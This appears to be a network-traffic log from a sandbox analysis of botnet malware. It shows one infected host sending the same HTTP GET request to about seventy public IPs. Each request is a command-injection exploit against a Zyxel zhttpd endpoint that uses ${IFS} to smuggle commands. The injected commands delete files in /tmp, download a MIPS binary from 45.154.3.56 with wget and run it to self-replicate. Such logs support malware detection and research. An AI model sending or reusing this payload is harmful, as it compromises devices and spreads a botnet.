                        Mar 12, 2024 08:50:25.003500938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        466192.168.2.1453134189.102.93.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003550053 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        467192.168.2.1442638122.122.228.44443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003607988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        468192.168.2.1440918112.62.62.214443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003676891 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        469192.168.2.1447664171.53.205.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003703117 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        470192.168.2.144534474.252.64.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003751993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        471192.168.2.1450408154.186.183.93443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003788948 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        472192.168.2.1437304200.244.98.121443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003839016 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        473192.168.2.146098451.24.115.84443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003876925 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        474192.168.2.1435546172.216.157.141443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003930092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        475192.168.2.1437472176.103.171.125443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.003956079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        476192.168.2.144810471.23.208.147443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004007101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        477192.168.2.145450839.1.129.85443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004034996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        478192.168.2.143280472.146.38.73443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004076004 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        479192.168.2.144156694.218.169.33443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004122972 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        480192.168.2.1447634148.244.101.16443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004164934 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        481192.168.2.1434352160.77.149.87443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004245043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        482192.168.2.1436000140.181.47.164443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004285097 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        483192.168.2.1446254150.128.119.38443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004327059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        484192.168.2.1452070137.104.217.21443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004364014 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        485192.168.2.145819878.133.30.230443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004414082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        486192.168.2.1452914104.147.34.192443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004445076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        487192.168.2.1454534110.56.59.156443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004481077 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        488192.168.2.144924272.30.110.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004515886 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        489192.168.2.1455282174.250.107.205443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004551888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        490192.168.2.1448256206.113.228.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004606009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        491192.168.2.1433572204.138.85.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004650116 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        492192.168.2.1433244170.176.126.221443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004710913 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        493192.168.2.1458208131.51.212.239443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004780054 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        494192.168.2.144050885.224.34.94443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004812956 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        495192.168.2.14460864.151.28.246443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004839897 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        496192.168.2.1456298128.176.18.107443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004893064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        497192.168.2.1442264179.28.72.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004920959 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        498192.168.2.145065224.216.65.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004973888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        499192.168.2.1450482217.158.150.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.004998922 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        500192.168.2.145686669.74.50.138443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005048990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        501192.168.2.143452014.233.66.201443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005098104 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        502192.168.2.144109863.185.58.124443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005139112 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        503192.168.2.1447478200.220.236.188443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005192995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        504192.168.2.145201252.165.17.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005238056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        505192.168.2.1454248207.244.1.174443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005265951 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        506192.168.2.145312659.40.157.51443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005316019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        507192.168.2.145475050.13.95.15443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005348921 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        508192.168.2.143959069.121.54.19443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005398989 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        509192.168.2.14598741.165.50.191443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005449057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        510192.168.2.144392042.224.222.124443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005491972 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        511192.168.2.1433384199.85.71.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005536079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        512192.168.2.1460802154.1.150.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005563021 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        513192.168.2.1434684136.62.165.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005594015 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        514192.168.2.1444534171.170.38.228443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005623102 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        515192.168.2.145025219.47.108.0443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005691051 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        516192.168.2.143282696.120.180.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005719900 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        517192.168.2.1453938170.202.36.145443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005789995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        518192.168.2.145965288.85.173.200443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005831957 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        519192.168.2.1445708164.10.173.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005857944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        520192.168.2.1433162134.251.107.123443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005868912 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        521192.168.2.1436412144.169.111.172443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005907059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        522192.168.2.1439746217.196.95.1443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.005975008 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        523192.168.2.1454770136.120.51.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006014109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        524192.168.2.1435674150.148.201.62443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006045103 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        525192.168.2.1459830109.25.59.102443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006093025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        526192.168.2.1459360108.185.43.192443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006122112 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        527192.168.2.144064896.181.63.153443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006162882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        528192.168.2.145732863.238.175.37443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006184101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        529192.168.2.1436378183.16.34.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006238937 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        530192.168.2.144908663.188.22.138443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006282091 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        531192.168.2.1447872170.150.177.12443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006321907 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        532192.168.2.1433358223.182.209.115443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006351948 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        533192.168.2.1447816192.71.194.154443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006401062 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        534192.168.2.1443344103.84.29.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.006460905 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        535192.168.2.1438366153.255.217.176443
                        TimestampBytes transferredDirectionData
